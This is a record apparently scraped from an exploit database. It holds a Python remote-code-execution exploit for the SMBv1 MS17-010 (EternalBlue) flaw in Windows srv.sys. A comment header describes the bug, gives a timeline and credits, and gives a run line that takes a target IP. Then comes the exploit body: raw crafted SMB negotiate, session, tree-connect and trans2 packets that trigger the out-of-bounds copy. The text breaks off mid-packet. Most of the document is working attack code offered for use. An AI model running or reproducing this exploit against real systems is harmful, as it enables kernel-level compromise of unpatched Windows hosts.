"1.6", "sourceHref": "https://0day.today/exploit/27752", "sourceData": "# Exploit Author: Juan Sacco\r\n# MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\r\n# Tested on: Microsoft Windows Server 2008 x64 SP1 R2 Standard \r\n#\r\n# Description: The SMBv1 server driver (srv.sys) is prone to a remote code execution\r\n# vulnerability because it fails to perform adequate boundary checks on\r\n# user-supplied input. Srv.sys computes the size of the converted FEA list in\r\n# SrvOs2FeaListSizeToNt; when that size calculation is wrong, the subsequent memmove in\r\n# SrvOs2FeaToNt copies beyond the bounds of the destination buffer (an out-of-bounds copy).\r\n# The vulnerability trigger point is as follows:\r\n#\r\n# Vulnerable code:\r\n# unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)\r\n# {\r\n# int v4; // [email\u00a0protected]\r\n# _BYTE *v5; // [email\u00a0protected]\r\n# unsigned int result; // [email\u00a0protected]\r\n# \r\n# v4 = a1 + 8;\r\n# *(_BYTE *)(a1 + 4) = *(_BYTE *)a2;\r\n# *(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1);\r\n# *(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2);\r\n# _memmove((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1));\r\n# v5 = (_BYTE *)(*(_BYTE *)(a1 + 5) + v4);\r\n# *v5++ = 0;\r\n# _memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));\r\n# result = (unsigned int)&v5[*(_WORD *)(a1 + 6) + 3] & 0xFFFFFFFC;\r\n# *(_DWORD *)a1 = result - a1;\r\n# return result;\r\n# }\r\n#\r\n# Impact: An attacker could exploit this vulnerability to execute arbitrary code in\r\n# kernel context, since the vulnerable code runs inside the srv.sys kernel driver. 
Failed exploit attempts could result in a\r\n# denial-of-service condition.\r\n#\r\n# Timeline:\r\n# 04/05/2017 - Research started\r\n# 04/05/2017 - First PoC using original code\r\n# 05/05/2017 - Kernel debugging on Windows 2008\r\n# 05/05/2017 - Exploit code first draft\r\n# 06/05/2017 - Functional PoC\r\n# 07/05/2017 - Added support for Zerosum0x0 shellcode\r\n# 08/05/2017 - Code revisited and bugs fixed\r\n# 09/05/2017 - First successful shell\r\n# 09/05/2017 - Exploit tested in QA Laba\r\n# 09/05/2017 - Exploit code final review\r\n# 09/05/2017 - Publish\r\n#\r\n# Vendor homepage: http://www.microsoft.com\r\n# This exploit is a port from the amazing work made by Risksense. Checkout the original project at: https://github.com/RiskSense-Ops/MS17-010\r\n# Credits: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco \r\n#\r\n# How to run: python3 ms17010.py ipaddress\r\n#\r\nimport sys\r\nimport socket\r\nimport time\r\nimport ast\r\nimport binascii\r\nimport os\r\n \r\ndef mod_replay():\r\n datfile = [\"('connect', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, 
b'\\\\x00\\\\x00\\\\x00\\\\x88\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\r\\\\xff\\\\x00\\\\x88\\\\x00\\\\x04\\\\x11\\\\n\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xd4\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x002\\\\x001\\\\x009\\\\x005\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x005\\\\x00.\\\\x000\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 'userid', 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00X\\\\xffSMBu\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x04\\\\xff\\\\x00X\\\\x00\\\\x08\\\\x00\\\\x01\\\\x00-\\\\x00\\\\x00\\\\\\\\\\\\x00\\\\\\\\\\\\x001\\\\x007\\\\x002\\\\x00.\\\\x001\\\\x006\\\\x00.\\\\x009\\\\x009\\\\x00.\\\\x005\\\\x00\\\\\\\\\\\\x00I\\\\x00P\\\\x00C\\\\x00$\\\\x00\\\\x00\\\\x00?????\\\\x00', 0.0)\", \"('recv', 1, 'treeid', 0.0)\", \"('send', 1, 
b'\\\\x00\\\\x00\\\\x048\\\\xffSMB\\\\xa0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x14\\\\x01\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x01\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00h\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\xec\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\
\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, 
b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0
0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\
